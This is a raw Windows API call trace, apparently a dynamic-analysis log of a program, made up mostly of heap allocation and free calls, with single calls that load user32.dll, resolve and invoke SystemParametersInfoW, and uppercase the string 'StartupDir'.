[0230.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0230.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0230.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0230.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0230.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0230.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0230.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0230.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0230.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0230.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0230.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0230.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0230.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0230.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0230.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0230.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0230.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0230.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0230.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0230.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0230.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0230.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0230.277] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0230.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0230.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0230.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0230.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0230.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0230.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0230.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0230.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0230.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0230.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0230.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0230.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0230.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0230.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0230.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0230.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0230.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0230.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0230.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0230.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0230.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0230.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0230.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0230.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0230.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0230.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0230.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0230.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0230.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0230.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0230.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0230.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0230.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0230.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0230.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0230.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0230.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0230.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0230.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0230.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0230.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0230.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0230.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0230.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0230.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0230.279] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0230.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0230.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0230.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0230.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f7140 [0230.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f7140, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0230.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0230.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0230.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0230.280] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0230.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0230.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0230.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0230.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0230.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0230.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0230.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0230.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0230.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0230.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0230.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0230.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0230.280] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0230.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3866a20 [0230.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f20 [0230.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0230.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0230.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0230.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0230.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0230.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0230.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0230.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0230.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0230.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0230.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0230.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0230.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0230.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0230.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0230.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0230.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0230.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0230.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0230.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0230.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0230.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0230.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0230.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0230.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0230.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0230.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0230.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0230.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0230.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0230.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0230.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0230.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0230.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0230.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0230.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0230.365] FreeLibrary (hLibModule=0x76240000) returned 1 [0230.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0230.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0230.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0230.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0230.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0230.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0230.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0230.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0230.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0230.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0230.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0230.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0230.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0230.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0230.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0230.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0230.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0230.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0230.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0230.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0230.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0230.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0230.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0230.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0230.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0230.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0230.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0230.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0230.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0230.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0230.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865b08 [0230.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0230.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0230.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3866a20 | out: hHeap=0x2af0000) returned 1 [0230.367] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0230.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0230.367] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0230.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0230.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0230.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0230.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0230.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0230.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0230.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0230.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0230.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0230.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0230.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0230.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0230.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0230.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0230.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0230.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0230.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0230.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0230.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0230.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0230.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0230.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0230.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0230.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0230.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0230.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0230.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0230.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865b08 | out: hHeap=0x2af0000) returned 1 [0230.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0230.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0230.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0230.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0230.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0230.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0230.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0230.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0230.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0230.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0230.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0230.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0230.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0230.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0230.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0230.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0230.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0230.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0230.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0230.369] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0230.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0230.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0230.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0230.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0230.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0230.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0230.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0230.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0230.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0230.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0230.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0230.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0230.369] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0230.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0230.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0230.369] RtlAllocateHeap 